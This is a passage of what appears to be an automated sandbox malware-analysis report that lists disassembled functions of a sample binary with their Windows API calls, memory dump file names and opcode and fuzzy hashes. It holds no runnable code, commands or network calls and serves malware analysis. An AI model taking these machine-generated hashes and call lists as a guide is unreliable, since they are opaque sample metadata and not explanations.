                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E7EC4A
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00E7EC54
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00E7EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ce43a555b96793f63ff85ec5a5ace4d8bc3486c02099aea027d944db798a3285
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9fd085604676e653191862e75c4b1e872b5cd3e7c434abc7f1bfbe0b1cced207
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce43a555b96793f63ff85ec5a5ace4d8bc3486c02099aea027d944db798a3285
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1E012B0C08205EFCB41AFA1DC08A9EBBB1AB08310F108519E84AF33A0EB386905DF00
                                                                                                                                                                                                                                                                                                    Function 00E73616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID: @COM_EVENTOBJ$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-192135924
                                                                                                                                                                                                                                                                                                    • Opcode ID: d8d4b3cf19a43ca651fe0dee458b1a11a587a53657cbe315753c89d4f9a19ce7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 234bd3989b622252589b79d802e8512ebc2070fd8009596a534a7aa5b750e289
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d4b3cf19a43ca651fe0dee458b1a11a587a53657cbe315753c89d4f9a19ce7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFF17071A083009FD718DF24C841B6AB7E1BF84708F14996DF58AB72A1D771EE45DB82
                                                                                                                                                                                                                                                                                                    Function 00EA85DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E405B2: EnterCriticalSection.KERNEL32(00EF170C,?,00000000,?,00E2D22A,00EF3570,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?), ref: 00E405BD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E405B2: LeaveCriticalSection.KERNEL32(00EF170C,?,00E2D22A,00EF3570,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?,00000001,00EF2430), ref: 00E405FA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40413: __onexit.LIBCMT ref: 00E40419
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00EA8658
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40568: EnterCriticalSection.KERNEL32(00EF170C,00000000,?,00E2D258,00EF3570,00E627C9,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?), ref: 00E40572
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40568: LeaveCriticalSection.KERNEL32(00EF170C,?,00E2D258,00EF3570,00E627C9,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?,00000001), ref: 00E405A5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 535116098-2837176596
                                                                                                                                                                                                                                                                                                    • Opcode ID: a50717ac6b889d4f18b8bed3a4db658af84aae583281cac8f41a89118c538ba1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9623e87e1707260e2e479f556ae30196198e1b29d6dab61b3d9e44622742ecdf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50717ac6b889d4f18b8bed3a4db658af84aae583281cac8f41a89118c538ba1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F915B74A00208AFCB08EF54DA919ADBBF1BF49304F54905AF916BF292DF71AE41CB50
                                                                                                                                                                                                                                                                                                    Function 00E957CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E95919
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                    • Opcode ID: b1c4f957b8c6d976b86ef471f8db1463bc23beb5c22f863ab883cd356c4d8daa
                                                                                                                                                                                                                                                                                                    • Instruction ID: fbe4a4d4e8465e284ecee141ad6fd95fdcdb58dceb0c4a5c97087d144f221cdd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1c4f957b8c6d976b86ef471f8db1463bc23beb5c22f863ab883cd356c4d8daa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B791B076A00604DFDB15CF54C8C4EAABBF1AF44308F199099E8496F362C771EE85CB90
                                                                                                                                                                                                                                                                                                    Function 00E85703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00E858AF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                    • String ID: 0$$Container
                                                                                                                                                                                                                                                                                                    • API String ID: 3565006973-836522788
                                                                                                                                                                                                                                                                                                    • Opcode ID: e82f6e27061090275e1ce900c950945f6ca2dc83ec7917b86412ae4a427fa24d
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac8fc44640557a49475e8d80e9e014c5086acf8bb3e0253daa47dda2a4fe1f1d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e82f6e27061090275e1ce900c950945f6ca2dc83ec7917b86412ae4a427fa24d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80815871200601EFDB14DF54C885E6ABBF8FF48714F20956EF95AAB2A1DBB0E841CB50
                                                                                                                                                                                                                                                                                                    Function 00E4E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00E4E67D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                    • Opcode ID: c85004c53d68241a9d82e855a21d27321545e20177bb9b239164f0a908f55899
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb3f8d2b9d03098a01c21d055c3caf978c86788bdde659d768a1a344d8917eaf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c85004c53d68241a9d82e855a21d27321545e20177bb9b239164f0a908f55899
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31519D60E0A5018AC7117724EF013BA2BA0BB50715F30ADA9F8D1713E8DF358C8E9B46
                                                                                                                                                                                                                                                                                                    Function 00E3A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                    • Opcode ID: a3734159e5d4696e3e10d2c26d13daf14adfc200db61210c11200dbfd75ccfff
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c0d15d18f9f30d0c89c49cc7946371841c80d004c0eec1388c507e39d0f03dc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3734159e5d4696e3e10d2c26d13daf14adfc200db61210c11200dbfd75ccfff
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59516831544246DFCB25DF28D448AFA7BA0EF65314F289069F8E5BB2C0EB709D82CB51
                                                                                                                                                                                                                                                                                                    Function 00E3F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00E3F6DB
                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E3F6F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f3e41c526d9d551ea91b10398e75c9d798c8734b1da1d7f2a34f1856a5e17d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 707408b62249347db1673d1cdf3420ecb8205fffe2eccc7852057b9b827f69e9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3e41c526d9d551ea91b10398e75c9d798c8734b1da1d7f2a34f1856a5e17d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B75148B14097589FD320AF11EC86BABBBF8FB94300F81885DF1D9611A1DF318529CB66
                                                                                                                                                                                                                                                                                                    Function 00EB4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00EB40BD
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EB40F8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87959761d9a4c026627c303a3f188ff0db3848c253f26f8eb659d0b1d9b4a546
                                                                                                                                                                                                                                                                                                    • Instruction ID: 07f94874c8199039f5e19d73e5f0bef7408404078fcfb8bfd7f4d76268339c00
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87959761d9a4c026627c303a3f188ff0db3848c253f26f8eb659d0b1d9b4a546
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 623190B1100604AEDB14DF78CC80EFB77A9FF48724F009619F995A7191DA71AC81CB61
                                                                                                                                                                                                                                                                                                    Function 00EB4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EB50BD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB50D2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                    • Opcode ID: 931563f3ec3f963cf267ee71fb0be2fccf62644054e21920a0a2a239abb2dca5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a12dc583f0fab5e71eb80aa9ee6bef910fd5bb2d97940e800f51fedb2080989
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 931563f3ec3f963cf267ee71fb0be2fccf62644054e21920a0a2a239abb2dca5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B313575A0170A9FDB14DFA9C880BEEBBB5FF49304F20506AE904AB391D771A945CF90
                                                                                                                                                                                                                                                                                                    Function 00E220B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E63440
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00E634CA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2181805148-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6afd018a29de6bc55c67ef92cf14ca95d60350f1b48785f25a100858edd1abe2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c2d1238439d7bb0d03d024a19134e617f3cc628280faca3be1638683d2253e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6afd018a29de6bc55c67ef92cf14ca95d60350f1b48785f25a100858edd1abe2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21D230202164BFCB269F38EC49DB53BA6EF463A4F142248F7252B2F2C7318E55D610
                                                                                                                                                                                                                                                                                                    Function 00EB41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: GetStockObject.GDI32(00000011), ref: 00E278C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EB4216
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00EB4230
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 177704d5937b67fdd005538ac6576cd1acf882e4b39fdf9be55a945f3665defa
